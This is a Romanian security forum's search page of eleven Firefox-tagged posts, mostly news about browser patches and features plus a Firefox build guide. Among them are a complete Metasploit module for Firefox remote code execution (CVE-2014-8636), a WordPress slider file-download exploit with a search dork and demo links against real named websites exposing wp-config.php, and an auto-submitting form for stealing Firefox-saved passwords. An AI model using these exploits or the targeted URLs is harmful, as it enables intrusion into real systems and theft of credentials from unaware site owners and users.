Jump to content

Search the Community

Showing results for tags 'firefox'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Fake News Romania
    • Sugestii
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 11 results

  1. Poate va este folositor. https://www.sendspace.com/file/h4rxna SOURCE: HackHound
  2. Salut, Ori sau facut modificari ori... Incerc de acasa si de la service dar si de pe un vps din Olanda sa ma conectez cu Mozilla Firefox pe RST si imi da cacatul asta : Ma gandesc ca nam cum sa fiu singurul care pateste, adica 3 ip-uri diferite, 3 pc-uri diferite, doar pe Mozilla firefox patesc, acum is intrat de pe IE (nu ma injurati) Am curatat cookies and cache, istoric, restart..degeaba...
  3. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex/exploitation/jsobfu' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserAutopwn include Msf::Exploit::Remote::FirefoxPrivilegeEscalation def initialize(info = {}) super(update_info(info, 'Name' => 'Firefox Proxy Prototype Privileged Javascript Injection', 'Description' => %q{ This exploit gains remote code execution on Firefox 31-34 by abusing a bug in the XPConnect component and gaining a reference to the privileged chrome:// window. This exploit requires the user to click anywhere on the page to trigger the vulnerability. }, 'License' => MSF_LICENSE, 'Author' => [ 'joev' # discovery and metasploit module ], 'DisclosureDate' => "Jan 20 2014", 'References' => [ ['CVE', '2014-8636'], ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1120261'], ['URL', 'https://community.rapid7.com/community/metasploit/blog/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636' ] ], 'Targets' => [ [ 'Universal (Javascript XPCOM Shell)', { 'Platform' => 'firefox', 'Arch' => ARCH_FIREFOX } ], [ 'Native Payload', { 'Platform' => %w{ java linux osx solaris win }, 'Arch' => ARCH_ALL } ] ], 'DefaultTarget' => 0, 'BrowserRequirements' => { :source => 'script', :ua_name => HttpClients::FF, :ua_ver => lambda { |ver| ver.to_i.between?(31, 34) } } )) register_options([ OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>." ]) ], self.class) end def on_request_exploit(cli, request, target_info) send_response_html(cli, generate_html(target_info)) end def default_html "The page has moved. <span style='text-decoration:underline;'>Click here</span> to be redirected." end def generate_html(target_info) key = Rex::Text.rand_text_alpha(5 + rand(12)) frame = Rex::Text.rand_text_alpha(5 + rand(12)) r = Rex::Text.rand_text_alpha(5 + rand(12)) opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin js = js_obfuscate %Q| var opts = #{JSON.unparse(opts)}; var key = opts['#{key}']; var props = {}; props.has = function(n){ if (!window.top.x && n=='nodeType') { window.top.x=window.open("chrome://browser/content/browser.xul", "x", "chrome,,top=-9999px,left=-9999px,height=100px,width=100px"); if (window.top.x) { Object.setPrototypeOf(document, pro); setTimeout(function(){ x.location='data:text/html,<iframe mozbrowser src="about:blank"></iframe>'; setTimeout(function(){ x.messageManager.loadFrameScript('data:,'+key, false); setTimeout(function(){ x.close(); }, 100) }, 100) }, 100); } } } var pro = Object.getPrototypeOf(document); Object.setPrototypeOf(document, Proxy.create(props)); | %Q| <!doctype html> <html> <body> <script> #{js} </script> #{datastore['CONTENT'] || default_html} </body> </html> | end end Source
  4. It's been a long time coming, but now the users of Firefox and Opera browsers don’t need to rely on the Chrome browser to access WhatsApp Web client, as the most popular smartphone messaging service has announced that the Web-based version of its service now works on Firefox and Opera web browsers too. WHATSAPP WEB AVAILABLE FOR OPERA & FIREFOX Almost a month ago, WhatsApp launched the web client of its service but the access was limited only to the Google Chrome users. Now, the company is giving more choices to desktop users by launching WhatsApp Web Today for Opera and Firefox browsers, though you’ll still have to wait a little long if you’re a Safari user. WhatsApp Web is nothing than an extension of the core mobile WhatsApp application. It syncs conversations from your smartphone devices to your PCs, with everything stored on the mobile device itself. HOW TO USE WHATSAPP ON PC/DESKTOP In order to install WhatsApp web in your PC or laptop running Google Chrome, Mozilla Firefox or Opera browsers, you need to follow same steps, as the sign-up process is the same as with Chrome browser: Interested WhatsApp users simply need to open Chrome and navigate to WhatsApp Web A QR code will appear on the web page, which must be scanned using WhatsApp mobile application to activate the service. By scanning the QR code that appears, users will automatically have paired their mobile WhatsApp with the WhatsApp web client, as shown. For now, WhatsApp Web only works with Android, Windows Phone and BlackBerry devices, but unfortunately, iPhones still don't have the capability to scan the WhatsApp Web QR code because there's no web solution at this time for iOS users because of limitations of the platform. Currently, WhatsApp has 700 million users sending 30 billion messages per day, and is bigger than most of its competitors, including Facebook Messenger, Line and WeChat. Now, this new WhatsApp web client available for a wider range of browsers will definitely increase its market. Source
  5. Mozilla has patched 16 security vulnerabilities in Firefox, including three critical flaws in the browser. One of the critical vulnerabilities patched with the release of Firefox 36 is a buffer overflow in the libstagefright library that can be exploitable under some circumstances. “Security researcher Pantrombka reported a buffer overflow in the libstagefright library during video playback when certain invalid MP4 video files led to the allocation of a buffer that was too small for the content. This led to a potentially exploitable crash,” the Mozilla advisory says. Among the other critical bugs patched in this release is a use-after-free vulnerability in the indexdDB component of the browser. “Security researcher Paul Bandha used the used the Address Sanitizer tool to discover a use-after-free vulnerability when running specific web content with IndexedDB to create an index. This leads to a potentially exploitable crash,” Mozilla said in its advisory. Firefox 36 also includes patches for a variety of memory safety vulnerabilities. The new release also includes fixes for a number of high-risk vulnerabilities, one of which affects the Mozilla updater function in the browser. The bug could let an attacker load malicious files. “Security researcher Holger Fuhrmannek reported that when the Mozilla updater is run directly, the updater will load binary DLL format files from the local working directory or from the Windows temporary directories. This occurs when it is run without the Mozilla Maintenance Service on Windows systems. This allowed for possibly malicious DLL files to execute with elevated privileges if a user agrees when a User Account Control (UAC) prompt from Windows is displayed,” the advisory says. The new browser also includes fixes for a handful of other medium and low-risk security bugs. Source
  6. Open source SWF player promises alternative to Adobe's endless security horror In November 2012 the Mozilla Foundation announced “Project Shumway”, an effort to create a “web-native runtime implementation of the SWF file format.” Two-and-a-bit years, and a colossal number of Flash bugs later, Shumway has achieved an important milestone by appearing in a Firefox nightly, a step that suggests it's getting closer to inclusion in the browser. Shumway's been available as a plugin for some time, and appears entirely capable of handling the SWF files. Few average users know of Shumway's existence, never mind seek it out. So the inclusion of the software in Firefox's nightlies will give it greater exposure. For now the code can only play certain videos hosted on Amazon.com, but developers intend to expand the list of sites from which Shumway will play SWF files. For now, Shumway-in-Firefox-nightlies works only on Windows Vista or later versions of Windows, and OSX. But expanded support is promised. When it arrives in a full version of Firefox, it will mean that about 15.1 per cent of all web surfing won't need Flash (based on W3counter market share data). Flash is a security nightmare that we recently suggested deserves to rot in an unmarked grave. Mozilla looks to be giving it a welcome shove in just that direction. Source
  7. [+] Title: Wordpress slider reolusion local file download [+] Date: 2015-01-25 [+] Author: JOK3R [+] Vendor Homepage: https://wordpress.org/plugins/patch-for-revolution-slider/ [+] Tested on: windows 7 / firefox , kali linux / firefox [+] Vulnerable Files: /plugins/revolution-slider/ [+} Dork : "Index of" /wp-content/plugins/revolution-slider/ ### POC: http://victim/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php ### Demo: http://www.bungaburgerbar.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php http://www.peanut215.com/peanut/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php http://www.pro-businesscenter.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php ### Credits: [+] Special Thanks: Sheytan Azzam - Mohamad NOfozi - Root3r - Sina_lizard - Ali Ahmady - iliya Norton - Mr.Moein* - ALIREZA_PROMIS* And All iranian Hacker's And Exploiter's <3 [+] iran-cyber.in Source
  8. Hackbar ?Execute Commands like SQL Injection, XSS and more… link: https://addons.mozilla.org/en-US/firefox/addon/hackbar/ Live HTTP Headers ? Capture all <META> (HEADERS) of a Page (Used when uploading a shell….) link : https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/ SQL Inject Me ? SQL Injection Commands and Automatations link: https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/ Firebug ? Edit a Website’s source code link : https://addons.mozilla.org/en-US/firefox/addon/firebug/ Tamper Data ? Watch the data that your computer sends to a website and the data the website sends to you.Can Also Hack Flash Games Gifts like Wild Ones. link: https://addons.mozilla.org/en-us/firefox/addon/tamper-data/ Este nevoie sa mai traduc in limba romana ce face fiecare add-ons ?
  9. The latest release of the Firefox web browser, version 26, now blocks Java software on all websites by default unless the user specifically authorizes the Java plugin to run. The change has been a long time coming. The Mozilla Foundation had originally planned to make click-to-run the default for all versions of the Java plugin beginning with Firefox 24, but decided to delay the change after dismayed users raised a stink. Beginning with the version of Firefox that shipped on Tuesday, whenever the browser encounters a Java applet or a Java Web Start launcher, it first displays a dialog box asking for authorization before allowing the plugin to launch. Users can also opt to click "Allow and Remember," which adds the current webpage to an internal whitelist so that Java code on it will run automatically in the future, without further human intervention. Mozilla's move comes after a series of exploits made the Java plugin one of the most popular vectors for web-based malware attacks over the past few years. So many zero-day exploits targeting the plugin have been discovered, in fact, that the Firefox devs have opted to give all versions of Java the cold shoulder, including the most recent one. Generally speaking, Mozilla plans to activate click-to-run for all plugins by default, although the Adobe Flash Player plugin has been given a pass so far, owing to the prevalence of Flash content on the web. In addition to the change to the default Java plugin behavior, Firefox 26 includes a number of security patches, bug fixes, and minor new features. The official release notes are available here and a full list of changes in the release can be found here. As usual, current Firefox installations can be upgraded to version 26 using the internal update mechanism, and installers for the latest release are available from the Firefox homepage. Source: http://www.theregister.co.uk/2013/12/10/firefox_26_blocks_java/
  10. Introduction to Firefox Firefox is a stand-alone browser based on the Mozilla codebase. This package is known to build and work properly using an LFS-7.2 platform. Package Information Download (FTP): ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/16.0.1/source/firefox-16.0.1.source.tar.bz2 Download MD5 sum: 78e641c67dc4a40cb3f48fce3e782d41 Download size: 85 MB Estimated disk space required: 994 MB (34 MB installed) (or 647 MB and 4.1 MB if using xulrunner) Estimated build time: 27 SBU (0.4 SBU if using xulrunner) Firefox Dependencies Required alsa-lib-1.0.26 GTK+-2.24.13 Zip-3.0 UnZip-6.0 Recommended yasm-1.2.0 libvpx-v1.1.0 (to allow Firefox to play webm videos). Optional D-Bus Bindings startup-notification-0.12 SQLite-3.7.14.1 Hunspell: open source spell checking, stemming, morphological analysis and generation under GPL, LGPL or MPL licenses libevent-2.0.20 Doxygen-1.8.2 gnome-vfs-2.24.4 libgnomeui-2.24.5 (for integration with the old version of Gnome) libnotify-0.7.5 NSPR-4.9.2 NSS-3.13.6 Wireless Tools-29 Valgrind Home (only for testing the jemalloc code) Wget-1.14 Xulrunner-16.0.1 User Notes: firefox – BLFS Trac Installation of Firefox There are two major methods for building Firefox. In the standard case, the entire suite of libraries is built and installed. In the other, most of the system is built using the procedures found in Xulrunner-16.0.1. This is advantageous if you are planning to build other related packages such as IcedTea-Web-1.3. With either build method, you need to run the main build procedure below with the appropriate options in the mozconfig file. Then use the appropriate install instructions depending on the chosen build method. The configuration of Firefox is accomplished by creating a mozconfig file containing the desired configuration options. A default mozconfig is created below. To see the entire list of available configuration options (and an abbreviated description of each one), issue ./configure --help. You may also wish to review the entire file and uncomment any other desired options. The commented line for --with-libxul-sdk has an escaped dollar sign - if you have chosed to paste the entries into a mozconfig file in your editor, you do not need the escape, it is only necessary when invoking a subshell in a HERE document. Create the file by issuing the following command: cat > mozconfig << EOF # If you have a multicore machine you can speed up the build by running # several jobs at once, but if you have a single core, delete this line: mk_add_options MOZ_MAKE_FLAGS="-j4" # If you have not installed Yasm, uncomment this option: # ac_add_options --disable-webm # If you have installed DBus-Glib delete this option: ac_add_options --disable-dbus # If you have installed wireless-tools delete this option: ac_add_options --disable-necko-wifi # If you have installed libnotify delete this option: ac_add_options --disable-libnotify # If you have installed xulrunner uncomment these two lines: # ac_add_options --with-system-libxul # ac_add_options --with-libxul-sdk=\$(pkg-config --variable=sdkdir libxul) # Note: The backslash above is to facilitate a paste operation. It # should not appear in the mozconfig file. # Uncomment these if you have installed them: # ac_add_options --enable-startup-notification # ac_add_options --enable-system-hunspell # ac_add_options --enable-system-sqlite # ac_add_options --with-system-libevent # ac_add_options --with-system-libvpx # ac_add_options --with-system-nspr # ac_add_options --with-system-nss mk_add_options MOZ_OBJDIR=@TOPSRCDIR@/firefox-build-dir ac_add_options --enable-official-branding ac_add_options --prefix=/usr # The rest of these options have no effect if you're # building against an already installed xulrunner: ac_add_options --disable-crashreporter ac_add_options --disable-debug ac_add_options --disable-installer ac_add_options --disable-static ac_add_options --disable-tests ac_add_options --disable-updater ac_add_options --enable-shared ac_add_options --enable-system-cairo ac_add_options --enable-system-ffi ac_add_options --with-pthreads ac_add_options --with-system-jpeg ac_add_options --with-system-png ac_add_options --with-system-zlib EOF If you are building a stand-alone firefox with system versions of nspr, nss, or sqlite issue the following command: sed -i 's/\(MOZ_PKG_FATAL_WARNINGS =\).*/\1 0/' \ browser/installer/Makefile.in && Compile Firefox by issuing the following commands: sed -i 's# ""##' browser/base/Makefile.in && make -f client.mk This package does not come with a test suite. If you have not linked Firefox against an installed Xulrunner: make -C firefox-build-dir/browser/installer Now, as the root user, if you have not linked Firefox against an installed Xulrunner, install the package: rm -rf /usr/lib/firefox-16.0.1 && mkdir /usr/lib/firefox-16.0.1 && tar -xvf firefox-build-dir/dist/firefox-16.0.1.en-US.linux-$(uname -m).tar.bz2 \ -C /usr/lib/firefox-16.0.1 --strip-components=1 && ln -sfv ../lib/firefox-16.0.1/firefox /usr/bin && mkdir -pv /usr/lib/mozilla/plugins && ln -sfv ../mozilla/plugins /usr/lib/firefox-16.0.1 && chown -R -v root:root /usr/lib/firefox-16.0.1 If you have linked against an already installed Xulrunner, as the root user: make -C firefox-build-dir install && rm /usr/bin/firefox && cat > /usr/bin/firefox << "HERE_DOC" && #!/bin/bash /usr/lib/xulrunner-16.0.1/xulrunner /usr/lib/firefox-16.0.1/application.ini "${@}" HERE_DOC chmod 755 /usr/bin/firefox && mkdir -pv /usr/lib/mozilla/plugins && ln -sfv ../mozilla/plugins /usr/lib/firefox-16.0.1 NPAPI Headers The above instructions just install the parts you need to run Firefox. If you want to compile gnash-0.8.10, the open source version of Flash, copy some headers that Gnash needs into /usr/include, as the root user: rm -rf /usr/include/npapi && mkdir -v /usr/include/npapi && cp -v dom/plugins/base/*.h /usr/include/npapi Command Explanations sed -i 's/\(MOZ_PKG_FATAL_WARNINGS =\).*/\1 0/' ...: This sed fixes an error in the internal packaging check.. sed -i 's# ""##' browser/base/Makefile.in: This sed removes an unprintable control character from the title bar. make -f client.mk ...: Mozilla products are packaged to allow the use of a configuration file which can be used to pass the configuration settings to the configure command. make uses the client.mk file to get initial configuration and setup parameters. make -C firefox-build-dir/browser/installer: this creates a Firefox tarball similar to the ones you can download from Mozilla. tar -xfv firefox-build-dir/dist ...: This untars Firefox in /usr/lib. The --strip-components=1 option removes the leading 'firefox' directory from the filenames, allowing us to untar it into a versioned directory. make -C firefox-build-dir install: This runs make install in firefox-build-dir. ln -sfv ... /usr/bin/firefox: this puts a symbolic link to the firefox executable in your ${PATH}. mkdir -p /usr/lib/mozilla/plugins: this checks that /usr/lib/mozilla/plugins exists. ln -sv ... /usr/lib/firefox-16.0.1: this makes a symbolic link to /usr/lib/mozilla/plugins. It's not really needed, Firefox checks /usr/lib/mozilla/plugins by default, we make the symbolic link to keep all the plugins installed in one folder. Configuring Firefox If you deleted the --disable-webm option from your mozconfig, your Firefox can play most YouTube videos without the need for the flash plugin. To enable this, go to YouTube and click on 'Join the HTML5 Trial' (needs cookies enabled). If you use a desktop environment like Gnome or KDE you may like to create a firefox.desktop file so that Firefox appears in the panel's menus. If you didn't enable startup-notification in your mozconfig change the StartupNotify line to false. As the root user: mkdir -pv /usr/share/applications && cat > /usr/share/applications/firefox.desktop << "EOF" && [Desktop Entry] Encoding=UTF-8 Type=Application Name=Firefox Comment=Browse The Web Icon=firefox Exec=firefox Categories=Network;GTK;Application;Browser;WebBrowser; StartupNotify=true Terminal=false EOF ln -sfv /usr/lib/firefox-16.0.1/icons/mozicon128.png /usr/share/pixmaps/firefox.png Contents Installed Programs: firefox Installed Libraries: Numerous libraries, browser components, plugins, extensions, and helper modules installed in /usr/lib/firefox-16.0.1. Installed Directories: /usr/include/npapi and /usr/lib/firefox-16.0.1. sursa: Firefox-16.0.1
  11. Focul, Browserul-ul ?i Mintea i?i sunt de folos, atâta timp cât ?tii s? le st?pâne?ti Majoritatea utilizatorilor sunt atît de lene?i, încât prefer? s? spere c? ei nu vor fi ?inta vre-o unui atac cibernetic, decât s? caute/utilizeze informa?ia necesar? pentru a?i proteja datele confiden?iale, care, în majoritatea cazurilor, devin (datele) într-adev?r importante doar dup? ce vre-un ”nepoftit” ob?ine acces la ele. Dar dup? cum bine ?tim, dac? ceva r?u se poate întâmpla, se va întâmpla, iar faptul c? dorim din r?sputeri ca acest lucru s? nu se întâmple — nu ne va ajuta cu nimic. Iat? de ce, în acest articol vreau s? vorbesc pu?in despre siguran?a ?i comoditatea de a utiliza «Gestionarul de parole», care dup? p?rerea mea, împreun? nu fac o echip? prea bun?. Desigur, e foarte comod atunci când browser-ul completeaz? automat toate c?su?ele, inclusiv numele de utilizator ?i parola. Dar dup? cum v? da?i seama, aceste date sunt salvate pe hard disk ?i odat? ce cineva ob?ine acces la PC, ob?ine acces ?i la aceste date, care sunt încriptate ?i într-o oarecare m?sur? nu pot fi extrase atât de u?or cum ar dori unii. În principiu, fiecare companie încearc? s? ofere o protec?ie cât mai bun? a datelor de logare salvate de browser , dar dup? p?rerea mea, cel mai bine le reu?e?te celor de la Mozilla Foundation care dezvolt? renumitul browser Mozilla Firefox. Adic?, chiar dac? atacatorul ob?ine acces la fi?ierele în care sunt salvate parolele browser-ului, tehnologia folosit? de Firefox va avea grij? ca atacatorul s? nu poat? extrage (prea u?or) datele încriptate. Bazându-ne pe astfel de ”idei”, ar fi mai logic ?i mai sigur s? salv?m parole cu ajutorul «Gestionarului de parole», deoarece, chiar dac? PC-ul va fi infectat cu un Trojan (desigur, care nu poate extrage datele încriptate) parolele r?mân în siguran?? atâta timp cât utilizatorul nu introduce manual parola pe o pagin? scam sau capturat? de un sniffer. Totu?i, aceasta din urm? metod?, cu p?rere de bine, din câteva motive (cum ar fi Challenge-response authentication sau conexiunile securizate) nu va func?iona pentru toate site-urile. Cât despre paginile scam, într-adev?r aceast? tehnologie e destul de periculoas? ce la sigur îi va afecta pe majoritatea utilizatorilor ”simpli”. Dar de obicei, spre deosebire de marea majoritate, chiar dac? un expert introduce parola pe o pagin? scam, v?zând c? parola nu este acceptat? sau c? browser-ul se comport? ”straniu” — pe loc î?i va seama despre ce e vorba ?i va ?ti c? are minute num?rate pentru a accesa cât mai rapid contul electronic ?i s? schimbe parola, ca mai apoi s? caute ?i s? înl?ture problema. Acum, haide?i s? ne imagin?m un utilizator ce are un cont pe un site important, are instalat browser-ul Firefox, parolele pentru acest site sunt salvate cu ajutorul «Gestionarului de parole», dar pe lâng? toate astea, mai are un mic ”progr?mel” care ruleaz? f?r? ?tirea lui ?i a?tept? comenzile de la ”st?pân”. Din fericire, eroul nostru (utilizatorul desigur), ?tie foarte bine ce e securitatea informa?ional? ?i dup? cum v? da?i bine seama, atacatorul nu poate fura parolele salvate cu ajutorul unei pagini scam (am uitat s? precizez c? acel mic ”progr?mel” e atât de mic, încât nu putea nici extrage datele încriptate ?i nici sniffer nu avea). Îns?, nec?tînd la faptul c? utilizatorul e un adev?rat profesional, pentru a fura parolele salvate cu ajutorul «Gestionarului de parole» Firefox, totu?i se poate folosi scam-ul, doar c? f?r? ca utilizatorul s? ”asiste” la aceast? scen? tragic?. Problema e c? o dat? ce browser-ul Firefox deschide un site pentru care au fost salvate datele de logare, automat completeaz? c?su?ele cu datele necesare, iar atacatorului nu-i r?mâne de cât s? simuleze click-ul utilizatorului. Cel mai interesant, este c? pentru Firefox acest lucru poate fi f?cut ?i la nivel de programare web: <html> <head> <title>Welcome to Scam page</title> </head> <body onload='document.forms[0].send.click();'> <form method='post'> <input type='text' name='user' /> <input type='password' name='pass' /> <input type='submit' name='send' id='send' value='login' /> </form> </body> </html> Astfel, dac? parolele au fost salvate cu ajutorul «Gestionarului de parole», deschizând pagina de mai sus — c?su?ele «user» ?i «pass» vor fi completate automat de c?tre Firefox ?i datele vor fi trimise c?tre server, f?r? ca utilizatorul s? apese sau s? introduc? ceva. În principiu, cam asta a fost ideea. Desigur, mai sunt multe întreb?ri legate, de exemplu, despre celelalte browsere, despre acei mul?i utilizatori care cred c? ”eu sunt un expert ?i cu u?urin?? voi observa scam-ul” ?i multe alte întreb?ri, r?spunsul la care, foarte repede îl ve?i g?si dac? ie?i?i din ”cutiu??”.
×
×
  • Create New...